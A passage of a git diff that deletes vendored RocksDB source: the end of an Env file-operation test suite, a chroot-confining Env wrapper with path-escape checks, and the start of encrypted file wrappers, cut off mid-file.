-// Returns a vector of 0 or 1 Env*, depending whether an Env is registered for
-// TEST_ENV_URI.
-//
-// The purpose of returning an empty vector (instead of nullptr) is that gtest
-// ValuesIn() will skip running tests when given an empty collection.
-std::vector<Env*> GetCustomEnvs() {
-  static Env* custom_env;
-  static std::unique_ptr<Env> custom_env_guard;
-  static bool init = false;
-  if (!init) {
-    init = true;
-    const char* uri = getenv("TEST_ENV_URI");
-    if (uri != nullptr) {
-      custom_env = NewCustomObject<Env>(uri, &custom_env_guard);
-    }
-  }
-
-  std::vector<Env*> res;
-  if (custom_env != nullptr) {
-    res.emplace_back(custom_env);
-  }
-  return res;
-}
-
-}  // anonymous namespace
-
-INSTANTIATE_TEST_CASE_P(CustomEnv, EnvBasicTestWithParam,
-                        ::testing::ValuesIn(GetCustomEnvs()));
-
-INSTANTIATE_TEST_CASE_P(CustomEnv, EnvMoreTestWithParam,
-                        ::testing::ValuesIn(GetCustomEnvs()));
-
-#endif  // ROCKSDB_LITE
-
-TEST_P(EnvBasicTestWithParam, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize(test_dir_ + "/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists(test_dir_ + "/f"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-  ASSERT_OK(env_->DeleteFile(test_dir_ + "/f"));
-
-  // Write to the file.
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/f1", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/f2", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/f1", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming works.
-  ASSERT_TRUE(
-      !env_->RenameFile(test_dir_ + "/non_existent", test_dir_ + "/g").ok());
-  ASSERT_OK(env_->RenameFile(test_dir_ + "/f1", test_dir_ + "/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/f1"));
-  ASSERT_OK(env_->FileExists(test_dir_ + "/g"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that renaming overwriting works
-  ASSERT_OK(env_->RenameFile(test_dir_ + "/f2", test_dir_ + "/g"));
-  ASSERT_OK(env_->GetFileSize(test_dir_ + "/g", &file_size));
-  ASSERT_EQ(0U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(!env_->NewSequentialFile(test_dir_ + "/non_existent", &seq_file,
-                                       soptions_)
-                   .ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile(test_dir_ + "/non_existent",
-                                         &rand_file, soptions_)
-                   .ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile(test_dir_ + "/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile(test_dir_ + "/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/g"));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_TRUE(
-      env_->GetChildren(test_dir_ + "/non_existent", &children).IsNotFound());
-}
-
-TEST_P(EnvBasicTestWithParam, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile(test_dir_ + "/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile(test_dir_ + "/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_TRUE(rand_file->Read(1000, 5, &result, scratch).ok());
-}
-
-TEST_P(EnvBasicTestWithParam, Misc) {
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/b", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_P(EnvBasicTestWithParam, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, static_cast<char>(i));
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(test_dir_ + "/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile(test_dir_ + "/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete [] scratch;
-}
-
-TEST_P(EnvMoreTestWithParam, GetModTime) {
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/dir1"));
-  uint64_t mtime1 = 0x0;
-  ASSERT_OK(env_->GetFileModificationTime(test_dir_ + "/dir1", &mtime1));
-}
-
-TEST_P(EnvMoreTestWithParam, MakeDir) {
-  ASSERT_OK(env_->CreateDir(test_dir_ + "/j"));
-  ASSERT_OK(env_->FileExists(test_dir_ + "/j"));
-  std::vector<std::string> children;
-  env_->GetChildren(test_dir_, &children);
-  ASSERT_EQ(1U, children.size());
-  // fail because file already exists
-  ASSERT_TRUE(!env_->CreateDir(test_dir_ + "/j").ok());
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/j"));
-  ASSERT_OK(env_->DeleteDir(test_dir_ + "/j"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(test_dir_ + "/j"));
-}
-
-TEST_P(EnvMoreTestWithParam, GetChildren) {
-  // empty folder returns empty vector
-  std::vector<std::string> children;
-  std::vector<Env::FileAttributes> childAttr;
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_OK(env_->FileExists(test_dir_));
-  ASSERT_OK(env_->GetChildrenFileAttributes(test_dir_, &childAttr));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_EQ(0U, childAttr.size());
-
-  // folder with contents returns relative path to test dir
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/niu"));
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/you"));
-  ASSERT_OK(env_->CreateDirIfMissing(test_dir_ + "/guo"));
-  ASSERT_OK(env_->GetChildren(test_dir_, &children));
-  ASSERT_OK(env_->GetChildrenFileAttributes(test_dir_, &childAttr));
-  ASSERT_EQ(3U, children.size());
-  ASSERT_EQ(3U, childAttr.size());
-  for (auto each : children) {
-    env_->DeleteDir(test_dir_ + "/" + each);
-  }  // necessary for default POSIX env
-
-  // non-exist directory returns IOError
-  ASSERT_OK(env_->DeleteDir(test_dir_));
-  ASSERT_TRUE(!env_->FileExists(test_dir_).ok());
-  ASSERT_TRUE(!env_->GetChildren(test_dir_, &children).ok());
-  ASSERT_TRUE(!env_->GetChildrenFileAttributes(test_dir_, &childAttr).ok());
-
-  // if dir is a file, returns IOError
-  ASSERT_OK(env_->CreateDir(test_dir_));
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(
-      env_->NewWritableFile(test_dir_ + "/file", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-  ASSERT_TRUE(!env_->GetChildren(test_dir_ + "/file", &children).ok());
-  ASSERT_EQ(0U, children.size());
-}
-
-}  // namespace rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/env_chroot.cc b/thirdparty/rocksdb/env/env_chroot.cc
deleted file mode 100644
index 6a1fda8..0000000
--- a/thirdparty/rocksdb/env/env_chroot.cc
+++ /dev/null
@@ -1,324 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include "env/env_chroot.h"
-
-#include <errno.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class ChrootEnv : public EnvWrapper {
- public:
-  ChrootEnv(Env* base_env, const std::string& chroot_dir)
-      : EnvWrapper(base_env) {
-#if defined(OS_AIX)
-    char resolvedName[PATH_MAX];
-    char* real_chroot_dir = realpath(chroot_dir.c_str(), resolvedName);
-#else
-    char* real_chroot_dir = realpath(chroot_dir.c_str(), nullptr);
-#endif
-    // chroot_dir must exist so realpath() returns non-nullptr.
-    assert(real_chroot_dir != nullptr);
-    chroot_dir_ = real_chroot_dir;
-#if !defined(OS_AIX)
-    free(real_chroot_dir);
-#endif
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewSequentialFile(status_and_enc_path.second, result,
-                                         options);
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewRandomAccessFile(status_and_enc_path.second, result,
-                                           options);
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewWritableFile(status_and_enc_path.second, result,
-                                       options);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    auto status_and_old_enc_path = EncodePath(old_fname);
-    if (!status_and_old_enc_path.first.ok()) {
-      return status_and_old_enc_path.first;
-    }
-    return EnvWrapper::ReuseWritableFile(status_and_old_enc_path.second,
-                                         status_and_old_enc_path.second, result,
-                                         options);
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewRandomRWFile(status_and_enc_path.second, result,
-                                       options);
-  }
-
-  virtual Status NewDirectory(const std::string& dir,
-                              unique_ptr<Directory>* result) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewDirectory(status_and_enc_path.second, result);
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::FileExists(status_and_enc_path.second);
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    auto status_and_enc_path = EncodePath(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetChildren(status_and_enc_path.second, result);
-  }
-
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    auto status_and_enc_path = EncodePath(dir);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetChildrenFileAttributes(status_and_enc_path.second,
-                                                 result);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::DeleteFile(status_and_enc_path.second);
-  }
-
-  virtual Status CreateDir(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::CreateDir(status_and_enc_path.second);
-  }
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::CreateDirIfMissing(status_and_enc_path.second);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    auto status_and_enc_path = EncodePath(dirname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::DeleteDir(status_and_enc_path.second);
-  }
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetFileSize(status_and_enc_path.second, file_size);
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    auto status_and_enc_path = EncodePath(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetFileModificationTime(status_and_enc_path.second,
-                                               file_mtime);
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& dest) override {
-    auto status_and_src_enc_path = EncodePath(src);
-    if (!status_and_src_enc_path.first.ok()) {
-      return status_and_src_enc_path.first;
-    }
-    auto status_and_dest_enc_path = EncodePathWithNewBasename(dest);
-    if (!status_and_dest_enc_path.first.ok()) {
-      return status_and_dest_enc_path.first;
-    }
-    return EnvWrapper::RenameFile(status_and_src_enc_path.second,
-                                  status_and_dest_enc_path.second);
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& dest) override {
-    auto status_and_src_enc_path = EncodePath(src);
-    if (!status_and_src_enc_path.first.ok()) {
-      return status_and_src_enc_path.first;
-    }
-    auto status_and_dest_enc_path = EncodePathWithNewBasename(dest);
-    if (!status_and_dest_enc_path.first.ok()) {
-      return status_and_dest_enc_path.first;
-    }
-    return EnvWrapper::LinkFile(status_and_src_enc_path.second,
-                                status_and_dest_enc_path.second);
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    // FileLock subclasses may store path (e.g., PosixFileLock stores it). We
-    // can skip stripping the chroot directory from this path because callers
-    // shouldn't use it.
-    return EnvWrapper::LockFile(status_and_enc_path.second, lock);
-  }
-
-  virtual Status GetTestDirectory(std::string* path) override {
-    // Adapted from PosixEnv's implementation since it doesn't provide a way to
-    // create directory in the chroot.
-    char buf[256];
-    snprintf(buf, sizeof(buf), "/rocksdbtest-%d", static_cast<int>(geteuid()));
-    *path = buf;
-
-    // Directory may already exist, so ignore return
-    CreateDir(*path);
-    return Status::OK();
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    auto status_and_enc_path = EncodePathWithNewBasename(fname);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::NewLogger(status_and_enc_path.second, result);
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* output_path) override {
-    auto status_and_enc_path = EncodePath(db_path);
-    if (!status_and_enc_path.first.ok()) {
-      return status_and_enc_path.first;
-    }
-    return EnvWrapper::GetAbsolutePath(status_and_enc_path.second, output_path);
-  }
-
- private:
-  // Returns status and expanded absolute path including the chroot directory.
-  // Checks whether the provided path breaks out of the chroot. If it returns
-  // non-OK status, the returned path should not be used.
-  std::pair<Status, std::string> EncodePath(const std::string& path) {
-    if (path.empty() || path[0] != '/') {
-      return {Status::InvalidArgument(path, "Not an absolute path"), ""};
-    }
-    std::pair<Status, std::string> res;
-    res.second = chroot_dir_ + path;
-#if defined(OS_AIX)
-    char resolvedName[PATH_MAX];
-    char* normalized_path = realpath(res.second.c_str(), resolvedName);
-#else
-    char* normalized_path = realpath(res.second.c_str(), nullptr);
-#endif
-    if (normalized_path == nullptr) {
-      res.first = Status::NotFound(res.second, strerror(errno));
-    } else if (strlen(normalized_path) < chroot_dir_.size() ||
-               strncmp(normalized_path, chroot_dir_.c_str(),
-                       chroot_dir_.size()) != 0) {
-      res.first = Status::IOError(res.second,
-                                  "Attempted to access path outside chroot");
-    } else {
-      res.first = Status::OK();
-    }
-#if !defined(OS_AIX)
-    free(normalized_path);
-#endif
-    return res;
-  }
-
-  // Similar to EncodePath() except assumes the basename in the path hasn't been
-  // created yet.
-  std::pair<Status, std::string> EncodePathWithNewBasename(
-      const std::string& path) {
-    if (path.empty() || path[0] != '/') {
-      return {Status::InvalidArgument(path, "Not an absolute path"), ""};
-    }
-    // Basename may be followed by trailing slashes
-    size_t final_idx = path.find_last_not_of('/');
-    if (final_idx == std::string::npos) {
-      // It's only slashes so no basename to extract
-      return EncodePath(path);
-    }
-
-    // Pull off the basename temporarily since realname(3) (used by
-    // EncodePath()) requires a path that exists
-    size_t base_sep = path.rfind('/', final_idx);
-    auto status_and_enc_path = EncodePath(path.substr(0, base_sep + 1));
-    status_and_enc_path.second.append(path.substr(base_sep + 1));
-    return status_and_enc_path;
-  }
-
-  std::string chroot_dir_;
-};
-
-Env* NewChrootEnv(Env* base_env, const std::string& chroot_dir) {
-  if (!base_env->FileExists(chroot_dir).ok()) {
-    return nullptr;
-  }
-  return new ChrootEnv(base_env, chroot_dir);
-}
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/env/env_chroot.h b/thirdparty/rocksdb/env/env_chroot.h
deleted file mode 100644
index b2760bc..0000000
--- a/thirdparty/rocksdb/env/env_chroot.h
+++ /dev/null
@@ -1,22 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include <string>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Returns an Env that translates paths such that the root directory appears to
-// be chroot_dir. chroot_dir should refer to an existing directory.
-Env* NewChrootEnv(Env* base_env, const std::string& chroot_dir);
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/env/env_encryption.cc b/thirdparty/rocksdb/env/env_encryption.cc
deleted file mode 100644
index 6b688a6..0000000
--- a/thirdparty/rocksdb/env/env_encryption.cc
+++ /dev/null
@@ -1,909 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <cctype>
-#include <iostream>
-
-#include "rocksdb/env_encryption.h"
-#include "util/aligned_buffer.h"
-#include "util/coding.h"
-#include "util/random.h"
-
-#endif
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-class EncryptedSequentialFile : public SequentialFile {
-  private:
-    std::unique_ptr<SequentialFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    uint64_t offset_;
-    size_t prefixLength_;
-
-     public:
-  // Default ctor. Given underlying sequential file is supposed to be at
-  // offset == prefixLength.
-  EncryptedSequentialFile(SequentialFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-      : file_(f), stream_(s), offset_(prefixLength), prefixLength_(prefixLength) {
-  }
-
-  // Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-  // written by this routine.  Sets "*result" to the data that was
-  // read (including if fewer than "n" bytes were successfully read).
-  // May set "*result" to point at data in "scratch[0..n-1]", so
-  // "scratch[0..n-1]" must be live when "*result" is used.
-  // If an error was encountered, returns a non-OK status.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Read(size_t n, Slice* result, char* scratch) override {
-    assert(scratch);
-    Status status = file_->Read(n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    status = stream_->Decrypt(offset_, (char*)result->data(), result->size());
-    offset_ += result->size(); // We've already ready data from disk, so update offset_ even if decryption fails.
-    return status;
-  }
-
-  // Skip "n" bytes from the file. This is guaranteed to be no
-  // slower that reading the same data, but may be faster.
-  //
-  // If end of file is reached, skipping will stop at the end of the
-  // file, and Skip will return OK.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Skip(uint64_t n) override {
-    auto status = file_->Skip(n);
-    if (!status.ok()) {
-      return status;
-    }
-    offset_ += n;
-    return status;
-  }
-
-  // Indicates the upper layers if the current SequentialFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override { 
-    return file_->use_direct_io(); 
-  }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-
-  // Positioned Read for direct I/O
-  // If Direct I/O enabled, offset, n, and scratch should be properly aligned
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, char* scratch) override {
-    assert(scratch);
-    offset += prefixLength_; // Skip prefix
-    auto status = file_->PositionedRead(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    offset_ = offset + result->size();
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class EncryptedRandomAccessFile : public RandomAccessFile {
-  private:
-    std::unique_ptr<RandomAccessFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  EncryptedRandomAccessFile(RandomAccessFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : file_(f), stream_(s), prefixLength_(prefixLength) { }
-
-  // Read up to "n" bytes from the file starting at "offset".
-  // "scratch[0..n-1]" may be written by this routine.  Sets "*result"
-  // to the data that was read (including if fewer than "n" bytes were
-  // successfully read).  May set "*result" to point at data in
-  // "scratch[0..n-1]", so "scratch[0..n-1]" must be live when
-  // "*result" is used.  If an error was encountered, returns a non-OK
-  // status.
-  //
-  // Safe for concurrent use by multiple threads.
-  // If Direct I/O enabled, offset, n, and scratch should be aligned properly.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const override {
-    assert(scratch);
-    offset += prefixLength_;
-    auto status = file_->Read(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-  // Readahead the file starting from offset by n bytes for caching.
-  virtual Status Prefetch(uint64_t offset, size_t n) override {
-    //return Status::OK();
-    return file_->Prefetch(offset + prefixLength_, n);
-  }
-
-  // Tries to get an unique ID for this file that will be the same each time
-  // the file is opened (and will stay the same while the file is open).
-  // Furthermore, it tries to make this ID at most "max_size" bytes. If such an
-  // ID can be created this function returns the length of the ID and places it
-  // in "id"; otherwise, this function returns 0, in which case "id"
-  // may not have been modified.
-  //
-  // This function guarantees, for IDs from a given environment, two unique ids
-  // cannot be made equal to eachother by adding arbitrary bytes to one of
-  // them. That is, no unique ID is the prefix of another.
-  //
-  // This function guarantees that the returned ID will not be interpretable as
-  // a single varint.
-  //
-  // Note: these IDs are only valid for the duration of the process.
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    return file_->GetUniqueId(id, max_size);
-  };
-
-  virtual void Hint(AccessPattern pattern) override {
-    file_->Hint(pattern);
-  }
-
-  // Indicates the upper layers if the current RandomAccessFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override {
-     return file_->use_direct_io(); 
-  }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-};
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class EncryptedWritableFile : public WritableFileWrapper {
-  private:
-    std::unique_ptr<WritableFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  // Default ctor. Prefix is assumed to be written already.
-  EncryptedWritableFile(WritableFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : WritableFileWrapper(f), file_(f), stream_(s), prefixLength_(prefixLength) { }
-
-  Status Append(const Slice& data) override { 
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToAppend(data); 
-    if (data.size() > 0) {
-      auto offset = file_->GetFileSize(); // size including prefix
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToAppend = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->Append(dataToAppend); 
-    if (!status.ok()) {
-      return status;
-    }
-    return status;
-  }
-
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToAppend(data); 
-    offset += prefixLength_;
-    if (data.size() > 0) {
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToAppend = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->PositionedAppend(dataToAppend, offset);
-    if (!status.ok()) {
-      return status;
-    }
-    return status;
-  }
-
